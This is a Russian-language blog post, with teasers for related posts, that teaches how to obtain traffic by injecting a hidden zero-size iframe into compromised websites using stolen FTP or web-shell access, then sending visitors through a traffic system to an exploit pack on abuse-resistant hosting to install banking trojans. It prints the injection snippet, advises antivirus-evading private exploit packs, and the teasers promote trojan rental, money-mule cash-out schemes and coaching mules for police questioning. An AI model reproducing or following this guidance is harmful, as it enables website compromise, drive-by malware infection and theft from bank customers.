Skip to main content

Кому и зачем нужен iFrame трафик и причем тут реальные заливщики и обнал


Трафик - на сленге вебмастеров и поисковых оптимизаторов — количество посетителей, пришедших на веб-сайт или дорвей, он разделяется на страны, или же можно купить себе микс трафф - это смешаный трафик нескольких стран стразу.

Для чего нужен трафик?
В своей основе iFrame трафик дроповоды и реальные заливщики денег на карты и счета используют для загрузок (что такое iFrame я расскажу позже). А что такое загрузки? Ещё трафик можно продавать.

Где взять трафик?
Конечно же трафик можно купить, но для чего? Его можно добыть самому и продавать или использовать для загрузок банковских ботов. Ещё трафик можно брать с ломаных сайтов, дорвеев, спам рассылок...

Чтобы иметь трафик дроповодам нужны FTP или прогуженый шелл различных сайтов, а лучше иметь своё доверенное лицо в Укртелекоме - это самый надёжный вариант.

Для чего мне нужны FTP и Shell и что мне с ними делать?
iFrame - это код HTML внутри страницы. С помощью iFrame дроповод может вставлять один HTML документ в другой! Проще говоря, iFrame - это код, который можно вписать в страницу любого сайта (или в транзитный трафик), чтобы поиметь трафик самому.

Например, мы вставили свой iFrame в главную страницу сайта www.site.ru и при заходе на сайт пользователь будет заходить одновременно на наш сайт, не ведая того!
Вот и сам iFrame код, который нужно вставить в код сайта с которого хотим получать трафик:

<iframe src="http://site.ru/sploit.php" width="0" height="0" frameborder="0"></iframe>

где:

http://site.ru/sploit.php - это сайт на который пользователи site.ru будут заходить одновременно
width="0" длина равна 0
height="0" высота равна 0
frameborder="0" граница фрейма равна 0

Что делать с Iframe?
Берем FTP или Shell какого-либо сайта, заходим в рабочий каталог сайта и редактируем главную страницу, обычно это index.html (php) или же заюзаем фильтры Ettercap NG через своего человека в Укртелекоме, и вставляем наш iFrame, не забываем после этого сохранить страницу.

Что нужно для продажи трафика?
Есть такая штука, как TDS - Traffic Direct System, - это система управления трафиком, в общем, такой небольшой web сайт, с помощью которого распределяется трафик, фильтруется, ведется статистика. Если у тебя возникает вопрос “а зачем оно мне нужно, у меня трафа мало и фильтровать его мне не нужно”, то отвечаю.

Например, ты лил трафф на кодеки, или на партнёрки, а они вдруг взяли и в новостях сегодня написали, что меняют свой домен. Что, будешь менять на всех дорах редирект?.. а когда они опять сменят домен, опять перелопачивать доры? Лучше в таком случае перенаправить весь трафф на Simple TDS, а от-туда уже лить трафф на партнерку. Или тебе захочется попробовать лить трафф на другую партнёрку, или даже просто на другой фид уже существующей.

В общем, если начинаете задумываться о бизе на трафике, то об установке Simple TDS следует позаботится в первую очередь. Сильно углубляться про TDS я не буду, но хочу дать не большой совет по поводу хостинга на который вы будете лить свой трафик. Покупайте лишь абузоустойчивый хостинг, потому что админы сайтов могут заподозрить не ладное и найти ваш iFrame и будут жаловаться вашему хостеру, поэтому лучше сразу покупать абузный хостинг.
Ну вот и всё, теперь поговорим про загрузки.

Что же такое эти загрузки?
Загрузки - это загрузка и запуск файла на компьютере клиента банка или простого лоха, - один из самых распространённых методов распространения банковских ботов в Интернет.



Загрузки можно делать с помощью ботнета и связки сплоитов. Поговорим про использование связки сплоитов...

Загрузки - это очень денежное дело, больше всего ценятся загрузки следующих стран: AU, UK, IT, NZ, ES, US.

Что нам нужно для того чтобы делать загрузки?
Нам нужен трафик, связка сплоитов и абузоустойчивый хостинг.

Допустим что у нас есть 5.000 трафика, это не означает что это у нас будет 5.000 загрузок, количество загрузок зависит от пробива используемой нами связки, если пробив у связки 20% значит у нас будет 1.000 загрузок.

Теперь про связку сплоитов
Exploit - это скрипт, который позволит нам выполнить действия на машине жертвы, через уязвимость в какой-либо программе (чаще всего в браузере).
А связка сплоитов (exploit-pack) это несколько сплоитов связанных в один скрипт. Причем связка построена так, что при открытии её пользователем она сама определяет версию операционной системы пользователя, версию обозревателя, версию установленной Java-машины и в зависимости от этого сама подбирает наиболее подходящий сплоит для нашего клиента.

Что же такое пробив связки?
Пробив - это процент загрузок с 1.000 трафика. Пробив зависит не только от связки, но и от качества трафика, то есть сколько длилась сессия и сколько по времени пользователь находился на сайте. Оно и понятно, чем дольше он находился - тем лучше для пробива и прогруза. Лучше всего брать приват связки, с хорошим пробивом, которые не палят антивирусы.

Как делать загрузки?
Думаю, вы уже сами догадались, но для не понятливых объясню. Например, ваша связка находится по адресу www.site.com/svjzka.php - значит нам надо лить трафик на этот адрес и тогда вы сможете получить всё, что захотите.

Comments

Popular posts from this blog

Обзор инструментов для перевода и отмывания денег

Идея, продукт или деньги, прямые руки и доступ на кардерский форум – вот все необходимое для обеспечения долгой, нечестной, но безбедной жизни. Этому способствует огромный хорошо организованный рынок приватных и абсолютно нелегальных услуг, предоставляемых кардерами. Там крутятся миллионы долларов. Там есть все, чтобы реализовать даже самые хитрые схемы «заработка». Сервисы на любой вкус и кошелек для скачивания денег через интернет. Поговорим об этом. Продажа или аренда банковских троянов Цена:  от $2500 за настроенный билд и скрипты админки, от $400 в неделю за аренду Большинство обнальных схем строиться на использовании специализированных троянов или банковских ботов , предназначенных для скачивания денег через интернет с банковских счетов. Наиболее востребованные и дорогие сейчас – именно банковские. Выросшие из простых формграбберов и кейлоггеров, эти программы по 10-20 тысяч строк кода совсем не просты. Они могут не только выдрать логин и пароль какого-нибудь онлайн-

Сбербанк и подневольные дропы, и кто кого?

Количество денег, списаных с банковских счетов и обналиченых дроповодами, которые маскируются под банковские колл-центры, растет в геометрической прогресии, и расположены такие колл-центры в местах лишения свободы, СИЗО и тюрьмах. То есть там, где, по идее, не то чтобы туда мобильный телефон пронести, муха не пролетит без ведома начальства. Ещё в 2012 году основным нелегальным способом списания денежных средств с банковских  карт был скимминг — дроповоды крепили к банкомату считывающее устройство, узнавали номер карточки и пин-код и только после этого дропы шли к банкоматам и снимали деньги. Однако, уже в 2017 году начался резкий рост « социальной инженерии », это когда вам, к примеру, звонят и говорят: это служба безопасности вашего банка, у вас с карты списаны денежные средста, или у нас в банке работают мошенники, ваши деньги в опасности, и вы сейчас, чтобы их спасти, должны срочно пойти к банкомату, мы сообщим вам номер безопасного счета, на который и надо ваши деньги перевести. И

Кому нужны дропы?

в этом видео хорошо показана жизнь одного современного человека, который начал налить белый пластик полезно посмотреть начинающим дропам - как вести себя со своим дроповодом , и что нужно рассказывать в полиции, в случае если вы туда попали

Как найти реального заливщика

Своего первого реального заливщика, который показал мне как можно скачать деньги в интернет с банковских счетов, я нашел случайно, когда еще трудился в Укртелекоме сменным инженером немного подрабатывая продавая трафик налево , но потом этот человек отошел от дел в связи со слишком уж скользкой ситуацией в данной сфере, и я решил поискать партнера на форумах, разместив рекламу на трёх электронных досках объявлений. Честно говоря поначалу даже был готов сразу закинуть 500 000 гривен в Гарант, но потом призадумался, а стоит ли? Ко мне начал обращаться народ обращается разных категорий 1. Дебильная школота, которая что-то любит повтирать про свою серьезность и просит закинуть 10 000 USD им на Вебмани в качестве аванса  2. Реальные мэны, которые  льют сразу большую сумму по SWIFT  без разговоров про гарантии и прочую шнягу, но после того, как им отдаёшь нал, они сразу пропадают, суть данных действий я так и не понял. зачем пропадать, если всё прошло гладко? 3. Мутные личност

Обнал белого пластика или как работают дроповоды

Сбербанк снял неплохой фильм про работу нальщиков и дропов Называется " Карточные фокусы ", которые судя по рассказанному могут обогатить кого угодно практически за один месяц занятия этим бизнесом. В обнальных схемах как правило участвуют несколько лиц, это так называемый заливщик (ботовод), дроповод - человек работающий с дропами (денежными мулами) и сами дропы, которые непосредственно совершают подходы к банкоматам и делают обнал. На самом деле все здравые украинские банки уже внедрили антискимминговые мероприятия, если как показано в кино попытаться установить скиммер, то потенциальных желающих обналичить чужие банковские карты быстро примут. Однако, есть и другие варианты работы в обнале, например, установка 3G маршрутизатора в отделении банка, или же разведение банковских ботов в через интернет, которые будут лить на карты дропов автозаливами.

Чем рискуют дропы и нальщики принимая заливы на свои карты

Зам.начальника управления Следственного департамента МВД Павел Сычев рассказал о криминальном бизнесе «нальщиков» - Глава Банка России Эльвира Набиуллина заявила о снижении объемов теневого оборота в конце 2013 года. Что показывает ваша статистика по выявлению незаконных операций? - В последние годы объем денежных средств, выведенных в теневой сектор, увеличивался, и криминогенная обстановка ухудшалась. Проблема находится в поле зрения президента -  в декабрьском послании Федеральному Собранию, он призвал избавить нашу финансовую систему от разного рода «отмывочных контор» и так называемых «прачечных». Оперативники уже получили ориентировку на более активное выявление этих преступлений. П о уголовным делам, расследованным МВД только в первом полугодии 2013 года, проходит 145 млрд рублей, обналиченных и незаконно выведенных заграницу. Это неуплаченные налоги, незаконный бизнес, хищения, взятки. Финансовый доход посредников от этих операций составил 8 млрд рублей. Расследовано 89